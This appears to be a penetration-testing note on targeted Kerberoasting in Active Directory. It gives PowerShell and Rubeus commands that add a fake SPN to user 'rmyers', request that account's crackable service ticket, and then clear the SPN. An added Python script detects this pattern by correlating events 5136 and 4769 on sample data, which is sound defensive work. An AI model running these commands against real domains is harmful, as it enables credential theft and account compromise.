Targeted Kerberoasting

If we have enough rights over a user object, we can make that account vulnerable to Kerberoasting by making it a service account (setting an SPN on it), so that we can steal and crack its hash. The sequence is: Create SPN -> Steal & Crack Hash -> Delete SPN.

Creating Fake SPNs

PS C:\> Set-DomainObject -Credential $Cred -Identity rmyers -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Kerberoasting via Rubeus

Rubeus is only an example; obviously you can use whatever you want.

PS C:\> .\Rubeus.exe kerberoast /user:rmyers /nowrap

Removing the Fake SPN

PS C:\> Set-DomainObject -Credential $Cred -Identity rmyers -Clear serviceprincipalname -Verbose
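
The Create SPN -> roast -> Delete SPN sequence above leaves a recognisable trail for defenders: an SPN that appears on a user object and disappears again shortly after, with a service ticket request for that account in between. The following is an added example, not part of the original page. It assumes Directory Service Changes auditing (event 5136) and Kerberos service ticket auditing (event 4769) are collected; the flattened field names, the 30-minute window and the sample values other than rmyers and notahacker/LEGIT are constructed for illustration.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window; tune per environment

# Constructed sample events (not real logs), reduced to the fields used below.
# 5136 = directory object modified, 4769 = Kerberos service ticket requested.
EVENTS = [
    {"time": "2024-05-01T10:00:05", "id": 5136, "object_class": "user", "op": "added",
     "attribute": "servicePrincipalName", "target": "rmyers",
     "value": "notahacker/LEGIT", "actor": "jdoe"},
    {"time": "2024-05-01T10:00:40", "id": 4769, "service": "rmyers",
     "requester": "jdoe@EXAMPLE.LOCAL", "etype": "0x17"},
    {"time": "2024-05-01T10:01:30", "id": 5136, "object_class": "user", "op": "deleted",
     "attribute": "servicePrincipalName", "target": "rmyers",
     "value": "notahacker/LEGIT", "actor": "jdoe"},
    # Benign: long-lived SPN registered on a real service account, never removed.
    {"time": "2024-05-01T11:00:00", "id": 5136, "object_class": "user", "op": "added",
     "attribute": "servicePrincipalName", "target": "svc_sql",
     "value": "MSSQLSvc/db01.example.local:1433", "actor": "dbadmin"},
    {"time": "2024-05-01T11:05:00", "id": 4769, "service": "svc_sql",
     "requester": "app01$@EXAMPLE.LOCAL", "etype": "0x12"},
]

def find_spn_flips(events, window=WINDOW):
    """Flag user objects whose SPN is added and removed again within `window`,
    attaching any service-ticket requests for that account made in between."""
    pending, findings = {}, []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4769:
            for (target, _spn), rec in pending.items():
                if ev["service"].lower() == target and ts - rec["added"] <= window:
                    rec["tickets"].append((ev["requester"], ev["etype"]))
            continue
        if (ev["id"] != 5136 or ev["object_class"] != "user"
                or ev["attribute"].lower() != "serviceprincipalname"):
            continue
        key = (ev["target"].lower(), ev["value"].lower())
        if ev["op"] == "added":
            pending[key] = {"added": ts, "actor": ev["actor"], "tickets": []}
        elif ev["op"] == "deleted" and key in pending:
            rec = pending.pop(key)
            if ts - rec["added"] <= window:
                findings.append({"target": key[0], "spn": ev["value"],
                                 "actor": rec["actor"], "tickets": rec["tickets"],
                                 "lifetime_s": (ts - rec["added"]).total_seconds()})
    return findings

if __name__ == "__main__":
    for f in find_spn_flips(EVENTS):
        print(f)
```

Event 5136 is only written for objects whose SACL audits writes, so the user objects of interest need that auditing in place before this correlation has anything to work with.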